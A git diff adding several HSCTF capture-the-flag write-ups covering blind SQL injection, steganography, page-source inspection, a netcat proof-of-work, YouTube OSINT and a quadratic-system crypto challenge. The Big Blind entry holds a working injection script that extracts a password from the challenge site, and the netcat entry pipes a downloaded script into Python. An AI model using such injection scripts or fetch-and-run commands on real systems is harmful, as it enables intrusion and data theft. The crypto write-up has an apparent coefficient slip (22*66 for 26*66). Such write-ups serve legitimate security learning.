idekctf
diff --git a/‎Big_Blind.md
+86 b/‎Big_Blind.md
+86
diff --git a/‎LsBlue.md
+21 b/‎LsBlue.md
+21
diff --git a/‎NRC.md
+26 b/‎NRC.md
+26
diff --git a/‎Return_of_the_Intro_to_Netcat.md
+28 b/‎Return_of_the_Intro_to_Netcat.md
+28
diff --git a/‎c-brother-1.md
+11 b/‎c-brother-1.md
+11
diff --git a/‎c-brother-2.md
+16 b/‎c-brother-2.md
+16
diff --git a/‎cyanocitta-cristata-cyanotephra-but-fixed.md
+113 b/‎cyanocitta-cristata-cyanotephra-but-fixed.md
+113
@@ -0,0 +1,86 @@
+-From the title "Big Blind" I assumed this was some kind of Blind Injection, probably SQL, but I didn't want to assume anything.
+-Sending a single ' returned a 500 internal server error, backing up my theory that it was probably blind SQL injection.
+
+-After trying a few different things, using the sleep function didn't return an error, but didn't seem to do anything.
+I tried other waiting commands like WAITFOR DELAY '0:0:10', dbms_pipe.receive_message(('a'),10) and pg_sleep(10), however, all of these returned errors. 
+This meant that it was probably either SQLlite or MySQL.
+
+-I then tested GLOB, a function that is in SQLlite but not MySQL, this returned an error, suggesting that it was MySQL
+
+-Because the database was MySQL, I knew that SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM 
+information_schema.tables),'a') would trigger an error if true, and put it into a python script to attempt to expose 
+the database's contents.
+
+-I used the script to determine the tablename (users) from information_schema.tables, then determined the column names 
+(user, pass) from information_schema.columns, and then finally enumerated the username and password (admin, the flag)
+
+-The script is here, I modified it to make it run for each different function, and in this form it is configured for 
+enumerating the flag, which was the last time I used it(sorry if its a bit messy):
+
+
+
+import requests
+url = "https://big-blind.hsc.tf/"
+payload = "user=ad'+'min&pass='+AND+IF(NOT+SUBSTRING((SELECT+TABLE_NAME+FROM+information_schema.tables+LIMIT+1),1,{})='{}',(SELECT+table_name+FROM+information_schema.tables),'a')#"
+headers = {
+  'Host': 'big-blind.hsc.tf',
+  'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0',
+  'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
+  'Accept-Language': 'en-US,en;q=0.5',
+  'Accept-Encoding': 'gzip, deflate',
+  'Content-Type': 'application/x-www-form-urlencoded',
+  'Content-Length': '166',
+  'Origin': 'https://big-blind.hsc.tf',
+  'Connection': 'close',
+  'Referer': 'https://big-blind.hsc.tf/',
+  'Upgrade-Insecure-Requests': '1'
+}
+
+
+lalph = list(map(chr, range(ord('a'), ord('z')+1)))
+Ualph = list(map(chr, range(ord('A'), ord('Z')+1)))
+nums = list(range(0,10))
+blank = [""]
+additionals = ["_","$","{","}"]
+totalPos = blank+additionals+lalph+Ualph+nums
+fullAlph = []
+for val in totalPos:
+    fullAlph.append(str(val))
+end = False
+thing = 0
+dbNames= []
+password = "flag"
+maxi = 50
+while thing < maxi:
+    if(end==True):
+        end=False
+        print("Adding: "+password)
+        dbNames+=[password]
+        password=""
+        
+        thing+=1
+    for Char in totalPos:
+        Char = str(Char)
+        reqH = payload
+        payload = "user=ad'+'min&pass='+AND+IF(NOT+SUBSTRING((SELECT+pass+FROM+users+WHERE+user='admin'+LIMIT+1+OFFSET+{}),1,{})='{}',(SELECT+table_name+FROM+information_schema.tables),'a')#"
+        reqH = reqH.format(thing,len(password)+1,password+Char)
+        #print(reqH)
+        response = requests.request("POST", url, headers=headers, data=reqH)
+        #print(response)
+        if("<html lang" in str(response.content)):
+            if(Char == ""):
+                end=True
+                break
+            else:
+                print(password+Char+"=True")
+                password+=Char
+                break
+        else:
+            print(password+Char+"=False")
+       
+    
+
+
+print("Database Names: ")
+for name in dbNames:
+    print(str(name))
@@ -0,0 +1,21 @@
+## Writeup for misc/LsBlue ##
+
+
+--Problem:
+Orca watching is an awesome pastime of mine!
+Downloads: lsblue.png
+
+
+--Solution:
+From the category of this problem, we know that it is in the misc/forensic category. So, the first step I tried was to download the image and open it up in a hex editor to analyze the metadata. No flag. My next attempt was to run a stego tool on the image. Since the image is a png I went with my favorite tool; Zsteg. 
+
+-Below is the command used in my shell: zsteg -a lsblue.png
+
+The output gave me tons of crap to sift through but I'm lazy and didn't want to do that, so with a quick grep command for flag{. We were able to modify the command and get the flag.
+
+-New command: zsteg -a lsblue.png | grep "flag{"
+-Output: b1,b,lsb,xy         .. text: "flag{0rc45_4r3nt_6lu3_s1lly_4895131}"
+
+And there it is!
+
+--Flag: flag{0rc45_4r3nt_6lu3_s1lly_4895131}
@@ -0,0 +1,26 @@
+## NRC (955 solves/107 points) ##
+## Description:
+Find the flag :)
+
+no-right-click.hsc.tf
+
+## Solution:
+As the link says, there's no right click on the website; however, with ``Ctrl+Shift+C`` we are able to see the developer console. We can navigate to the sources tab and then view ``useless-files.css``:
+```css
+body {
+    text-align: center;
+    font-size: 5rem;
+    font-family: 'Abril Fatface', cursive;
+}
+.small {
+    margin-top: 50vh;
+    font-size: 0.5rem;
+}
+/* cause i disabled it in index.js */
+/* no right click = n.r.c. */
+/* flag{keyboard_shortcuts_or_taskbar} */
+```
+And the the flag is on the last line.
+
+## Flag:
+flag{keyboard_shortcuts_or_taskbar}
@@ -0,0 +1,28 @@
+# Return of the Intro to Netcat (662 solves/160 points)
+## Description:
+hey, netcat seems fun! (with a twist)
+`nc return-of-the-intro-to-netcat.hsc.tf 1337`
+
+## Solution:
+After opening a terminal window and running `nc return-of-the-intro-to-netcat.hsc.tf 1337`, we see:
+```
+== proof-of-work: enabled ==
+please solve a pow first
+You can run the solver with:
+    python3 <(curl -sSL https://goo.gle/kctf-pow) solve s.AACF.AAB49VrGq+T0PVB6R9bV92Rb
+===================
+
+Solution?
+```
+I opened another terminal window and ran `python3 <(curl -sSL https://goo.gle/kctf-pow) solve s.AACF.AAB49VrGq+T0PVB6R9bV92Rb`, which returned:
+```
+s.AAA5PRheLM93CpiPiRpLZwqciE7d19rTavx4VoIS1Oz6DRxHHFFghOCjFGIJlmbTfR5IWsTTM8rWz3mqtD02OM/sJ8QRxQT9u880J4MRfH462nqMIj9+igTbIg8K3nODylfy9z6rJIovsoMD7iDeydAsMTZu/tMQLzAkJgYvDOpV3SaksRgiZF9pDAUiVYQVTwdxrGQf8V/Iap4PUkY8FVQ+
+```
+I copied the result and gave it as input to the first terminal window, which returned: 
+```
+Correct
+You got it! Here's what you're looking for: flag{the_cat_says_meow}
+```
+
+## Flag:
+flag{the_cat_says_meow}
@@ -0,0 +1,11 @@
+# c-brother-1 (65 solves/476 points)
+## Description:
+AC01010 and JC01010's long lost twin has joined the [HSCTF discord](https://discord.gg/C9UMj3qN8a) and started a Youtube channel! Although they haven't uploaded any videos, they've made some customizations to some of their video watermarks.
+
+Please respect the privacy of our organizers and do not OSINT any of our organizers. None of the flags are hidden on our own social media sites or other accounts. This challenge includes BC01010 and this person only. Do not visit any other profiles, including JC01010, AC, or any other organizers. Thank you.
+## Solution:
+I first went to the discord server and searched for '01010' and found the user BC01010. A [YouTube channel](https://www.youtube.com/channel/UCqZq81jZcdjAHQJ3UtAbdaA) was connected to the profile, but since there were no videos uploaded, I couldn't easily extract the watermark. After doing some research on channel watermarks, I found that this is the generic form for the watermark link: i.ytimg.com/an/{channelId}/featured_channel.jpg. The channel id can be found easily as it is the text after "UC" in https://www.youtube.com/channel/UCqZq81jZcdjAHQJ3UtAbdaA. After inserting the channel id in the generic watermark link, we see:
+![image](https://i.ytimg.com/an/qZq81jZcdjAHQJ3UtAbdaA/featured_channel.jpg)
+
+## Flag:
+`flag{h1dd3n_wat3rm@rk}`
@@ -0,0 +1,16 @@
+# c-brother-2 (49 solves/483 points)
+## Description:
+It looks like AC01010 and JC01010's third twin has changed their profile picture!
+
+Note: It may be helpful to solve c-brother-1 before c-brother-2
+
+Please respect the privacy of our organizers and do not OSINT any of our organizers. None of the flags are hidden on our own social media sites or other accounts. This challenge includes BC01010 and this person only. Do not visit any other profiles, including JC01010, AC, or any other organizers. Thank you.
+
+## Solution:
+The descriptions hints at finding an old profile picture for the [YouTube channel](https://www.youtube.com/channel/UCqZq81jZcdjAHQJ3UtAbdaA) we found in c-brother-1. To do so, I used the Wayback Machine on all the pages on the channel. Eventually, I found this link: https://web.archive.org/web/20210614150352if_/https://www.youtube.com/channel/UCqZq81jZcdjAHQJ3UtAbdaA/about, where the profile picture seemed to be the flag.
+![image](https://yt3.ggpht.com/Ug17FJY-SiCjr5JuAR_JIcBtmoUirZ2g6lVzm3NstW2K9gH5aH1jbuDaYF36-f4jdtTzd95f=s88-c-k-c0x00ffffff-no-rj)
+It was a bit hard to read, so I right-clicked the profile picture to get: https://web.archive.org/web/20210614150354/https://yt3.ggpht.com/Ug17FJY-SiCjr5JuAR_JIcBtmoUirZ2g6lVzm3NstW2K9gH5aH1jbuDaYF36-f4jdtTzd95f=s88-c-k-c0x00ffffff-no-rj. 
+I copied the portion of the link after "https://web.archive.org/web/20210614150354/" and changed "s88" to "s500" to see:
+![image](https://yt3.ggpht.com/Ug17FJY-SiCjr5JuAR_JIcBtmoUirZ2g6lVzm3NstW2K9gH5aH1jbuDaYF36-f4jdtTzd95f=s500-c-k-c0x00ffffff-no-rj)
+## Flag:
+flag{f1ag_fl@g_fla6}
@@ -0,0 +1,113 @@
+Writeup for crypto/cyanocitta-cristata-cyanotephra-but-fixed
+
+
+# Problem:
+Only the ciphertext has changed from the original challenge.
+
+The Blue Jay (Cyanocitta cristata) is a passerine bird in the family Corvidae, native to North America. It is resident through most of eastern and central United States and southern Canada, although western populations may be migratory. It breeds in both deciduous and coniferous forests, and is common near and in residential areas. It is predominately blue with a white chest and underparts, and a blue crest. It has a black, U-shaped collar around its neck and a black border behind the crest. Sexes are similar in size and plumage, and plumage does not vary throughout the year. Four subspecies of the Blue Jay are recognized.
+Downloads: [output.txt] [cyanocitta-cristata-cyanotephra.sage]
+
+
+# Solution:
+From the category of this problem, we know that it is a crypto problem, so let's download both [output.txt] and [cyanocitta-cristata-cyanotephra.sage]. Opening both
+
+-[output.txt]:
+[(26, 66, 70314326037540683861066), (175, 242, 1467209789992686137450970), (216, 202, 1514632596049937965560228), (13, 227, 485439858137512552888191), (1, 114, 112952835698501736253972), (190, 122, 874047085530701865939630), (135, 12, 230058131262420942645110), (229, 220, 1743661951353629717753164), (193, 81, 704858158272534244116883)]
+886191939093 589140258545
+19440293474977244702108989804811578372332250
+
+-[cyanocitta-cristata-cyanotephra.sage]:
+```
+import random
+var("x y")
+flag = int(open('flag.txt','rb').read().hex(),16)
+xs = [random.randint(1,256) for i in range(9)]
+ys = [random.randint(1,256) for i in range(9)]
+assert not any([xs[i]==ys[i] for i in range(9)])
+c = [random.randint(1,2^64) for i in range(len(xs))]
+f(x,y)=c[0]*x^2+c[1]*y^2+c[2]*x*y+c[3]*x+c[4]*y+c[5]
+solns = [int(f(xs[i],ys[i])) for i in range(len(xs))]
+print([(xs[i],ys[i],solns[i]) for i in range(9)])
+a,b = random.randint(1,2^40),random.randint(1,2^40)
+print(a,b)
+print((int(f(a,b)))^^flag)
+```
+
+-Let's breakdown [cyanocitta-cristata-cyanotephra.sage]:
+xs = [random.randint(1,256) for i in range(9)]
+The "xs" values create the first 9 values in each list. Let's group the xs values together from [output.txt] and put it in a matrix:
+xs = [26, 175, 216, 13, 1, 190, 135, 229, 193]
+Let's do the same for ys
+ys = [66, 242, 202, 227, 114, 122, 12, 220, 81]
+
+solns = [int(f(xs[i],ys[i])) for i in range(len(xs))]
+For "solns", we get the last 9 values in each list. This is found by f(x,y)=c[0]*x^2+c[1]*y^2+c[2]*x*y+c[3]*x+c[4]*y+c[5] equation.
+
+To find the values of c[0], c[1], c[2], c[3], c[4], c[5] we can create a system of equations by substiting 6 values of xs and 6 values of ys into the f(x,y) function. Let's change each c value to a variable.
+c[0]=a | c[1]=b | c[2]=c | c[3]=d | c[4]=e | c[5]=f
+Our 6 equations:
+```
+26**2a + 66**2b + 22*66c + 26d + 66e + f = 70314326037540683861066 
+175**2a + 242**2b + 175*242c + 175d + 242e + f = 1467209789992686137450970
+216**2a + 202**2b + 216*202c + 216d + 202e + f = 1514632596049937965560228
+13**2a + 227**2b + 13*227c + 13d + 227e + f = 485439858137512552888191
+1a + 114**2b + 114c + 1d + 114e + f = 112952835698501736253972
+190**2a + 122**2b + 122*190c + 190d + 122e + f = 874047085530701865939630
+```
+
+Now we're ready to solve for the a,b,c,d,e,f. I used this solve script with mpmath and npumpy after putting each equation into matrix form:
+```
+from mpmath import *
+import numpy as np
+
+mp.prec = 1000
+mp.dps = 1000
+mp.pretty = False
+
+print(mp)
+
+A = matrix([[mpf(26**2), mpf(66**2), mpf(22*66), mpf(26), mpf(66), mpf(1)], 
+[mpf(175**2), mpf(242**2), mpf(175*242), mpf(175), mpf(242), mpf(1)], 
+[mpf(216**2), mpf(202**2), mpf(216*202), mpf(216), mpf(202), mpf(1)], 
+[mpf(13**2), mpf(227**2), mpf(13*227), mpf(13), mpf(227), mpf(1)], 
+[mpf(1), mpf(114**2), mpf(114), mpf(1), mpf(114), mpf(1)], 
+[mpf(190**2), mpf(122**2), mpf(122*190), mpf(190), mpf(122),mpf(1)]])
+B = np.array([mpf(70314326037540683861066), mpf(1467209789992686137450970), mpf(1514632596049937965560228), 
+mpf(485439858137512552888191), mpf(112952835698501736253972), mpf(874047085530701865939630)])
+X = np.array((A**-1).tolist()).dot(B)
+
+print(X)
+```
+We obtain these values for c[0], c[1], c[2], c[3], c[4], c[5]:
+[mpf('11227347570319680787')
+ mpf('8521180195499215015')
+ mpf('14706786521482826438')
+ mpf('2369955372216026905') 
+ mpf('4447776531968912934')
+ mpf('14360386757903922932')]
+c[0]=11227347570319680787, c[1]=8521180195499215015, c[2]=14706786521482826438, c[3]=2369955372216026905, c[4]=4447776531968912934, c[5]=14360386757903922932
+
+Now that we know all neccesary values for c we can plug each of the numbers back into the original sagemath script with a little modification:
+a = 886191939093, b = 589140258545
+```
+import random
+var("x y")
+#flag = int(open('flag.txt','rb').read().hex(),16)
+#xs = [random.randint(1,256) for i in range(9)]
+#ys = [random.randint(1,256) for i in range(9)]
+#assert not any([xs[i]==ys[i] for i in range(9)])
+c = [11227347570319680787, 8521180195499215015,14706786521482826438,2369955372216026905,4447776531968912934,14360386757903922932]
+f(x,y)=c[0]*x^2+c[1]*y^2+c[2]*x*y+c[3]*x+c[4]*y+c[5]
+#solns = [int(f(xs[i],ys[i])) for i in range(len(xs))]
+#print([(xs[i],ys[i],solns[i]) for i in range(9)])
+a,b = 886191939093,589140258545
+#print(a,b)
+print(int(f(a,b)))
+```
+Output: 19453112380317214095677318883741141782768295
+We then XOR this with 19440293474977244702108989804811578372332250
+To get: 34852863801140041977112467590591656571005
+We convert this to hex, then ASCII to get our flag!
+
+# Flag: 
+flag{d8smdsx01a0}